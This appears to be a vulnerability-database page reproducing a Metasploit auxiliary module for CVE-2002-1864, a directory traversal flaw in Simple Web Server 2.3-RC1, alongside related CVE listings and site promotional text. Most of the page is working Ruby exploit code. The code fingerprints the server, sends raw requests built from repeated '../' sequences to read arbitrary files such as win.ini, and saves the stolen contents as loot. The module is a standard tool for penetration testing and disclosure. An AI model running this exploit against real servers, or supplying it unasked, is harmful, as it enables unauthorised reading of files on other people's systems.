Lucene search
K

Simple Web Server 2.3-RC1 Directory Traversal

🗓️ 06 Feb 2013 23:02:07Reported by CwG GeNiuS, sinn3r <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 24 Views

Simple Web Server 2.3-RC1 Directory Traversal. Exploits directory traversal vulnerability in Simple Web Server 2.3-RC

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2002-1864
29 May 201815:50
circl
CVE
CVE-2002-1864
28 Jun 200504:00
cve
Cvelist
CVE-2002-1864
28 Jun 200504:00
cvelist
NVD
CVE-2002-1864
31 Dec 200205:00
nvd
Packet Storm
Simple Web Server 2.3-RC1 Directory Traversal
1 Sep 202400:00
packetstorm
RedhatCVE
CVE-2002-1864
21 May 202520:25
redhatcve
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Simple Web Server 2.3-RC1 Directory Traversal',
      'Description'    => %q{
          This module exploits a directory traversal vulnerability found in
        Simple Web Server 2.3-RC1.
      },
      'References'     =>
        [
          [ 'CVE', '2002-1864' ],
          [ 'OSVDB', '88877' ],
          [ 'EDB', '23886' ],
          [ 'URL', 'https://seclists.org/bugtraq/2013/Jan/12' ]
        ],
      'Author'         =>
        [
          'CwG GeNiuS',
          'sinn3r'
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => '2013-01-03'
    ))

    register_options(
      [
        OptString.new('FILEPATH', [true, 'The name of the file to download', 'windows\\win.ini']),
        OptInt.new('DEPTH',       [true, 'The max traversal depth', 8])
      ])
  end

  #
  # The web server will actually return two HTTP statuses: A 400 (Bad Request), and the actual
  # HTTP status -- the second one is what we want.  We cannot use the original update_cmd_parts()
  # in Response, because that will only grab the first HTTP status.
  #
  def parse_status_line(res)
    str = res.to_s

    status_line = str.scan(/HTTP\/(.+?)\s+(\d+)\s?(.+?)\r?\n?$/)

    if status_line.empty?
      print_error("Invalid response command string.")
      return
    elsif status_line.length == 1
      proto, code, message = status_line[0]
    else
      proto, code, message = status_line[1]
    end

    return message, code.to_i, proto
  end


  #
  # The MSF API cannot parse this weird response
  #
  def parse_body(res)
    str = res.to_s
    str.split(/\r\n\r\n/)[2] || ''
  end


  def is_sws?
    res = send_request_raw({'uri'=>'/'})
    if res and res.headers['Server'].to_s =~ /PMSoftware\-SWS/
      return true
    else
      return false
    end
  end


  def run_host(ip)
    if not is_sws?
      print_error("#{ip}:#{rport} - This isn't a Simple Web Server")
      return
    end

    uri = normalize_uri("../"*datastore['DEPTH'], datastore['FILEPATH'])
    res = send_request_raw({'uri'=>uri})

    if not res
      print_error("#{ip}:#{rport} - Request timed out.")
      return
    end

    # The weird HTTP response totally messes up Rex::Proto::Http::Response, HA!
    message, code, proto = parse_status_line(res)
    body                 = parse_body(res)

    if code == 200

      if body.empty?
        # HD's likes vprint_* in case it's hitting a large network
        vprint_status("#{ip}:#{rport} - File is empty.")
        return
      end

      vprint_line(body)
      fname = ::File.basename(datastore['FILEPATH'])
      p = store_loot('simplewebserver.file', 'application/octet-stream', ip, body, fname)
      print_good("#{ip}:#{rport} - #{fname} stored in: #{p}")
    else
      print_error("#{ip}:#{rport} - Unable to retrieve file: #{code.to_s} (#{message})")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
0.3Low risk
Vulners AI Score0.3
CVSS 25
EPSS0.17772
24